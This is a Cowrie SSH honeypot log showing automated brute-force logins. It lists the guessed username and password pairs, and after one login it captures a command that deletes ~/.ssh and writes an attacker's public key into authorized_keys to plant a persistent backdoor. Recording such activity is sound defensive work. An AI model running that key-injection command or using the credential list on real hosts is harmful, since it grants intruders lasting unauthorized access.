{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:30:04.023780Z","src_ip":"212.227.235.229","session":"704ea76c9dc3"}
{"eventid":"cowrie.session.closed","duration":31.25116801261902,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:04.990118Z","src_ip":"212.227.235.229","session":"5f5c2e233ed0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:30:05.110309Z","src_ip":"212.227.235.229","session":"704ea76c9dc3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:06.377976Z","src_ip":"212.227.235.229","session":"704ea76c9dc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54802,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef66ae111489","protocol":"ssh","message":"New connection: 212.227.235.229:54802 (1.2.3.4:22) [session: ef66ae111489]","sensor":"my-vps","timestamp":"2025-08-31T05:30:06.621047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:30:06.627048Z","src_ip":"212.227.235.229","session":"ef66ae111489"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:30:06.873561Z","src_ip":"212.227.235.229","session":"ef66ae111489"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:30:07.871561Z","src_ip":"212.227.235.229","session":"ef66ae111489"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:08.124736Z","src_ip":"212.227.235.229","session":"ef66ae111489"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:08.127467Z","src_ip":"212.227.235.229","session":"fb38b0f11bfd"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":36168,"dst_ip":"1.2.3.4","dst_port":22,"session":"61da6e39f9a3","protocol":"ssh","message":"New connection: 170.64.166.123:36168 (1.2.3.4:22) [session: 61da6e39f9a3]","sensor":"my-vps","timestamp":"2025-08-31T05:30:09.284051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:30:09.285217Z","src_ip":"170.64.166.123","session":"61da6e39f9a3"}
{"eventid":"cowrie.login.failed","username":"test1","password":"123456","message":"login attempt [test1/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:30:09.367070Z","src_ip":"212.227.235.229","session":"e9e65d39162a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:30:09.560399Z","src_ip":"170.64.166.123","session":"61da6e39f9a3"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"1qaz@WSX3edc","message":"login attempt [ansible/1qaz@WSX3edc] failed","sensor":"my-vps","timestamp":"2025-08-31T05:30:10.659504Z","src_ip":"170.64.166.123","session":"61da6e39f9a3"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:11.172492Z","src_ip":"212.227.235.229","session":"e9e65d39162a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:11.936625Z","src_ip":"170.64.166.123","session":"61da6e39f9a3"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:30:19.190213Z","src_ip":"212.227.235.229","session":"223e3797b0e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38810,"dst_ip":"1.2.3.4","dst_port":22,"session":"863670bec5b4","protocol":"ssh","message":"New connection: 212.227.235.229:38810 (1.2.3.4:22) [session: 863670bec5b4]","sensor":"my-vps","timestamp":"2025-08-31T05:30:20.371147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:30:20.372145Z","src_ip":"212.227.235.229","session":"863670bec5b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:30:20.647450Z","src_ip":"212.227.235.229","session":"863670bec5b4"}
{"eventid":"cowrie.login.failed","username":"ttbot","password":"ttbot","message":"login attempt [ttbot/ttbot] failed","sensor":"my-vps","timestamp":"2025-08-31T05:30:21.794613Z","src_ip":"212.227.235.229","session":"863670bec5b4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:23.072003Z","src_ip":"212.227.235.229","session":"863670bec5b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39124,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b5e8875c4d3","protocol":"ssh","message":"New connection: 212.227.125.160:39124 (1.2.3.4:22) [session: 4b5e8875c4d3]","sensor":"my-vps","timestamp":"2025-08-31T05:30:24.012215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:30:24.326832Z","src_ip":"212.227.125.160","session":"4b5e8875c4d3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:30:24.328060Z","src_ip":"212.227.125.160","session":"4b5e8875c4d3"}
{"eventid":"cowrie.login.failed","username":"test1","password":"123456","message":"login attempt [test1/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:30:26.014591Z","src_ip":"212.227.125.160","session":"4b5e8875c4d3"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:27.752643Z","src_ip":"212.227.125.160","session":"4b5e8875c4d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60954,"dst_ip":"1.2.3.4","dst_port":22,"session":"7191c6b6ab9a","protocol":"ssh","message":"New connection: 212.227.125.160:60954 (1.2.3.4:22) [session: 7191c6b6ab9a]","sensor":"my-vps","timestamp":"2025-08-31T05:30:32.521393Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:30:33.338151Z","src_ip":"212.227.235.229","session":"223e3797b0e3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:30:33.338888Z","src_ip":"212.227.235.229","session":"223e3797b0e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52560,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f0126fbb86c","protocol":"ssh","message":"New connection: 212.227.235.229:52560 (1.2.3.4:22) [session: 6f0126fbb86c]","sensor":"my-vps","timestamp":"2025-08-31T05:30:37.322100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:30:37.322914Z","src_ip":"212.227.235.229","session":"6f0126fbb86c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T05:30:37.424530Z","src_ip":"212.227.235.229","session":"6f0126fbb86c"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"1234","message":"login attempt [odoo/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:30:37.730336Z","src_ip":"212.227.235.229","session":"6f0126fbb86c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:30:38.283195Z","src_ip":"212.227.125.160","session":"7191c6b6ab9a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:30:38.283967Z","src_ip":"212.227.125.160","session":"7191c6b6ab9a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:38.833945Z","src_ip":"212.227.235.229","session":"6f0126fbb86c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"6.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:39.411075Z","src_ip":"212.227.235.229","session":"223e3797b0e3"}
{"eventid":"cowrie.session.closed","duration":"52.6","message":"Connection lost after 52.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:39.412443Z","src_ip":"212.227.235.229","session":"223e3797b0e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46046,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0c3b7d98507","protocol":"ssh","message":"New connection: 212.227.235.229:46046 (1.2.3.4:22) [session: d0c3b7d98507]","sensor":"my-vps","timestamp":"2025-08-31T05:30:54.455849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:30:54.456575Z","src_ip":"212.227.235.229","session":"d0c3b7d98507"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:30:54.539307Z","src_ip":"212.227.235.229","session":"d0c3b7d98507"}
{"eventid":"cowrie.login.success","username":"root","password":"Root@2023","message":"login attempt [root/Root@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:30:54.912271Z","src_ip":"212.227.235.229","session":"d0c3b7d98507"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:30:55.539663Z","src_ip":"212.227.235.229","session":"d0c3b7d98507"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:30:55.540426Z","src_ip":"212.227.235.229","session":"d0c3b7d98507"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:30:55.541145Z","src_ip":"212.227.235.229","session":"d0c3b7d98507"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48968,"dst_ip":"1.2.3.4","dst_port":22,"session":"c018819ade1c","protocol":"ssh","message":"New connection: 212.227.235.229:48968 (1.2.3.4:22) [session: c018819ade1c]","sensor":"my-vps","timestamp":"2025-08-31T05:30:55.578555Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:55.624656Z","src_ip":"212.227.235.229","session":"d0c3b7d98507"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:30:55.812322Z","src_ip":"212.227.235.229","session":"d0c3b7d98507"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:30:55.813097Z","src_ip":"212.227.235.229","session":"d0c3b7d98507"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:30:55.897606Z","src_ip":"212.227.235.229","session":"d0c3b7d98507"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:30:55.898477Z","src_ip":"212.227.235.229","session":"d0c3b7d98507"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44338,"dst_ip":"1.2.3.4","dst_port":22,"session":"f93ac3a41b4d","protocol":"ssh","message":"New connection: 212.227.235.229:44338 (1.2.3.4:22) [session: f93ac3a41b4d]","sensor":"my-vps","timestamp":"2025-08-31T05:30:55.979353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:30:55.980064Z","src_ip":"212.227.235.229","session":"f93ac3a41b4d"}
